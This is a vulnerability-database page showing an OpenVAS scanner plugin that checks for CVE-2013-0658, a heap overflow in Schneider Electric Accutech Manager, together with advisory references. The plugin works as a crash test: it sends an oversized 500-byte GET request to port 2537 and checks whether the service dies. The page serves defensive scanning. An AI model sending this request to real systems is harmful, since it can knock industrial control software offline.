Schneider Electric Accutech Manager Buffer Overflow Vulnerability
🗓️ 11 Feb 2013 00:00:00Reported by Copyright (C) 2013 Greenbone AGType
openvas🔗 plugins.openvas.org👁 30 Views
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2013-0658 | 10 Feb 201300:00 | – | circl | |
| Schneider Electric Accutech Manager HTTP Request Processing Buffer Overflow (CVE-2013-0658) | 30 Jun 201300:00 | – | checkpoint_advisories | |
| CVE-2013-0658 | 15 Feb 201311:00 | – | cve | |
| CVE-2013-0658 | 15 Feb 201311:00 | – | cvelist | |
| Schneider Electric Accutech Manager - Heap Overflow (PoC) | 10 Feb 201300:00 | – | exploitdb | |
| Schneider Electric Accutech Manager Heap Overflow | 16 Nov 201307:00 | – | ics | |
| CVE-2013-0658 | 15 Feb 201312:09 | – | nvd | |
| Heap overflow | 15 Feb 201312:09 | – | prion | |
| CVE-2013-0658 | 22 May 202505:22 | – | redhatcve | |
| Schneider Electric Accutech Manager RFManagerService Heap Overflow | 18 Mar 201300:00 | – | nessus |
10
| Source | Link |
|---|---|
| exploit-db | www.exploit-db.com/exploits/24474 |
| securelist | www.securelist.com/en/advisories/52034 |
| securityfocus | www.securityfocus.com/bid/57651 |
| secunia | www.secunia.com/advisories/52034 |
# SPDX-FileCopyrightText: 2013 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.803170");
script_version("2023-07-21T05:05:22+0000");
script_cve_id("CVE-2013-0658");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_tag(name:"last_modification", value:"2023-07-21 05:05:22 +0000 (Fri, 21 Jul 2023)");
script_tag(name:"creation_date", value:"2013-02-11 19:51:40 +0530 (Mon, 11 Feb 2013)");
script_name("Schneider Electric Accutech Manager Buffer Overflow Vulnerability");
script_xref(name:"URL", value:"http://secunia.com/advisories/52034");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/57651");
script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/24474");
script_xref(name:"URL", value:"http://www.securelist.com/en/advisories/52034");
script_category(ACT_DENIAL);
script_tag(name:"qod_type", value:"remote_analysis");
script_copyright("Copyright (C) 2013 Greenbone AG");
script_family("Buffer overflow");
script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");
script_require_ports(2537);
script_exclude_keys("Settings/disable_cgi_scanning");
script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to execute
arbitrary code or cause the application to crash, creating a denial-of-service condition.");
script_tag(name:"affected", value:"Schneider Electric Accutech Manager version 2.00.1 and prior.");
script_tag(name:"insight", value:"The flaw is caused by an unspecified error, which can be exploited
to cause a heap-based buffer overflow by sending a specially crafted GET
request with more than 260 bytes to TCP port 2537.");
script_tag(name:"solution", value:"Upgrade to Schneider Electric Accutech Manager 2.00.4 or later.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"summary", value:"Schneider Electric Accutech Manager is prone to a buffer overflow vulnerability.");
exit(0);
}
include("http_func.inc");
port = 2537;
if(!get_port_state(port))
exit(0);
# nb: Application specific response is not available
banner = http_get_remote_headers(port:port);
if(!banner)
exit(0);
if(http_is_dead(port:port))
exit(0);
req = http_get(item:string("/", crap(500)), port:port);
res = http_send_recv(port:port, data:req);
sleep(1);
if(http_is_dead(port:port)) {
security_message(port:port);
exit(0);
}
exit(99);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Jul 2023 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 210
EPSS0.21527